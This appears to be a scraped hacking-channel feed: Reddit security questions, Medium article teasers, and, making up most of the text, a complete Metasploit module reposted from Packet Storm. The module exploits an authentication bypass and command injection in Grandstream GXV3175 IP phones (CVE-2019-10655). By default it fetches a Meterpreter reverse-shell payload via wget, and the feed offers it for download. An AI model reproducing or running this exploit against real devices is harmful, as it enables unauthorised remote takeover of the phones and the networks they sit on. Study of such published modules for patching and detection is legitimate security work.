Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66.1K photos
15 videos
157 files
133K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
Can a USB Mouse become infected with a virus?

I have heard your computer mouse can get infected with a Virus before somewhere.

I don't know if its true but remember reading about a firmware virus infecting a mouse or something.

I am familiar with "Bad USB's" but thats not what I'm refering to.

How could one detect this on a USB mouse?

Would it only be Wireless Mice not corded being affect or both?

submitted by /u/Wind0ze_User
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Phishing Texts and Calls

I got into a conflict with someone, who is relatively wealthy in the construction field, and then, since that day, I’ve been getting daily phishing texts and spammer ID Theft automated calls.

I live in Canada, and I didn’t know you could employ “hackers” to so such things.

1) How is he able to do that? 2) What should I do about it?

submitted by /u/jzififnyfiv
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Hacking my own iPhone

If I want to try hack into my own iPhone to see if I can get into it what is the best software to attempt this?

submitted by /u/Interesting_Stop_935
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Bug Bounty Methodology — Bug Hunting Checklist(PART-2)

Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the…Continue reading on Medium »
Read more...
Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…

Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting.Continue reading on Medium »
Read more...
My First Blind XSS

DisclaimerContinue reading on Medium »
Read more...
Early bed bug stains on sheets

Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with…Continue reading on Medium »
Read more...
Coletando parâmetros com o BURP SUITE!

A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Grandstream GXV3175 Unauthenticated Command Execution

https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png This Metasploit module exploits a command injection vulnerability in Grandstream GXV3175 IP multimedia phones. The settimezone action does not validate input in the timezone parameter allowing injection of arbitrary commands. A buffer overflow in the phonecookie cookie parsing allows authentication to be bypassed by providing an alphanumeric cookie 93 characters in length. This module was tested successfully on Grandstream GXV3175v2 hardware revision V2.6A with firmware version 1.0.1.19.

MD5 | d0714d342ba12f124e7b2588f1b2bde6Download ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

HttpFingerprint = { pattern: [ /Multimedia Phone/ ] }.freeze

def initialize(info = {})
super(
update_info(
info,
'Name' => "Grandstream GXV3175 'settimezone' Unauthenticated Command Execution",
'Description' => %q{
This module exploits a command injection vulnerability in Grandstream GXV3175
IP multimedia phones. The 'settimezone' action does not validate input in the
'timezone' parameter allowing injection of arbitrary commands.

A buffer overflow in the 'phonecookie' cookie parsing allows authentication
to be bypassed by providing an alphanumeric cookie 93 characters in length.

This module was tested successfully on Grandstream GXV3175v2
hardware revision V2.6A with firmware version 1.0.1.19.
},
'Author' => [
'alhazred', # Command injection vulnerability discovery and exploit
'Brendan Scarvell', # Auth bypass discovery
'bcoles' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' => [
[ 'CVE', '2019-10655' ],
[ 'URL', 'https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920' ],
[ 'URL', 'https://github.com/dirtyfilthy/gxv3175-remote-code-exec/blob/master/modules/exploits/linux/http/grandstream_gxv3175_cmd_exec.rb' ]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
},
'DisclosureDate' => '2016-09-01',
'Privileged' => true,
'Arch' => ARCH_ARMLE,
'DefaultOptions' => {
'PrependFork' => true,
'MeterpreterTryToFork' => true,
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget'
},
'CmdStagerFlavor' => %w[wget],
'Targets' => [
['Automatic', {}]
],
'DefaultTarget' => 0
)
)
end

def check
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => ''
}
)

if res && res.code == 200 && res.body.to_s.include?('Response=Success')
return CheckCode::Detected('phonecookie authentication bypassed successfully.')
end

CheckCode::Safe
end

def execute_command(cmd, _opts)
res = send_request_cgi(
'uri' => '/manager',
'cookie' => "phonecookie=\"#{rand_text_alpha(93)}\"",
'vars_get' => {
'action' => 'settimezone',
'timezone' => "`#{cmd}`"
}
)
unless res
fail_with(Failure::Unreachable, 'Connection failed')
end
unless res.code == 200
fail_with(Failure::UnexpectedReply, "Unexpected reply (HTTP #{res.code})")
end
unless res.body.to_s.include?('Response=Success')
fail_with(Failure::UnexpectedReply, "Unexpected reply (#{res.body.length} bytes)")
end
end

def exploit
execute_cmdstager(
linemax: 220, # 255 minus URL encoding
background: true
)
end
end
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)

So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out…Continue reading on Medium »
Read more...